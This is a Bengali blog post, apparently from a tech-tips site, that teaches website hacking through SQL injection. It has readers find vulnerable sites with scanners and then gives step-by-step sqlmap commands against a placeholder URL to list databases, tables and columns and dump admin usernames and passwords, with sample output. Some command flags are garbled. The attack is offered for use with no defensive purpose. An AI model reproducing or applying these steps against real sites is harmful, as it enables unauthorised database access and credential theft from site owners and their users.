ওয়েবসাইট হ্যাকিং এর অন্যতম জনপ্রিয় পদ্ধতি, SQL Injection !

0
851

ওয়েবসাইট হ্যাকিং এর অন্যতম জনপ্রিয় পদ্ধতি হল SQL Injection !

আজকে আপনাদের দেখাবো Sqlmap এর কাজ ! যা কালি লিনাক্সে আগে থেকেই বিদ্যমান !কোনো সাইট  SQL Injection এর যোগ্য কিনা তা জানতে Windows এর জন্য Nessus , Vega , Acunetix ব্যাবহার করতে পারেন ! সফটওয়্যার গুলু Google A Search দিলে পাবেন !

Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

Kali Linux এর ক্ষেত্রে Vega,Power Fuzzar ব্যাবহার করতে পারেন !

আচ্ছা ধরেন আপনি একটা ওয়েবসাইট পাইছেন যেটা SQL Injection  এর যোগ্য ! ঊপরের সফটওয়্যার গুলু বলে দিবে আপনাকে যে ঐ ওয়েবসাইট এর কোন লিঙ্কটা Vulnerable !

তাহলে ঐ ওয়েবসাইট এর Link টা হবে এমন : www.yoursite.com/index.php?id=32 !

এখন আপনার কাজ হল কালি লিনাক্স ওপেন করে  টার্মিনাল ওপেন করা ! প্রথমে আমরা ডাটাবেস বের করব তারপর টেবিল তারপর কলাম তারপর সেগুলু দেখব ডাম্প করার মাধ্যমে !

images ওয়েবসাইট হ্যাকিং এর অন্যতম জনপ্রিয় পদ্ধতি, SQL Injection !

তাহলে আমরা টার্মিনালে লিখবঃ    sqlmap -u www.yoursite.com/index.php?id=32–dbs

তারপর

আপনার কাছে কিছু জানতে চাইতে পারে ! ভালভাবে পড়ে দেখুন কি জানতে চাচ্ছে ! যদি না বুঝেন সমস্যা নাই ! লাইন এর লাস্টে দেখুন (Y/n) অথবা (y/N) এমন আসবে ! যেটা বড় হাতের হবে সেটা লিখুন !

উদাহরন ১ : Scan all directory (Y/n) Y  বড় হাতের তাহলে Y লিখে  Enter চাপুন !

উদাহরন ২ : Cancle Scane (y/N) N  বড় হাতের তাহলে N লিখে  Enter চাপুন !

কিছুক্ষন কাজ হবে ! তারপর আপনার সামনে হাজির হবে ঐ ওয়েবসাইট এর ডাটাবেস !

এমন :

*information_schema

*yoursite

তারপর

আমরা টার্মিনালে লিখবঃ

sqlmap -u www.yoursite.com/index.php?id=32 -D yoursite –tables

ভেঙ্গে বলতে হবে ??

টেবিল পাবো এমন :

user

files

admin

email

তারপর

আমরা টার্মিনালে লিখবঃ

sqlmap -u www.yoursite.com/index.php?id=32 -D yoursite -T admin –columns

কলাম পাবো এমন :

admin_username

admin_password

তারপর

আমরা টার্মিনালে লিখবঃ

sqlmap -u www.yoursite.com/index.php?id=32 -D yoursite -T admin -C admin_username –dump

[            Username        ]

[                                   ]

[             BOLOD           ]

[                                  ]

[___________________]

একই ভাবে পাসওয়ার্ড বের করব :

আমরা টার্মিনালে লিখবঃ

sqlmap -u www.yoursite.com/index.php?id=32 -D yoursite -T admin -C admin_password –dump

[            Password         ]

[                                   ]

[             123456           ]

[                                   ]

[___________________]

কারো প্রশ্ন থাকলে করতে পারেন ! আর অনেকেই বলবেন হাভিঝ দিয়ে ইজি ! কিন্তু হাভিঝ দিয়ে অনেক সাইট এর ডাটাবেস আসে না ঝামেলা করে !

টিউনারপেজের নতুন টিউন আপনাকে ইমেইল করব?
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

একটি উত্তর ত্যাগ

Please enter your comment!
Please enter your name here

11 + 13 =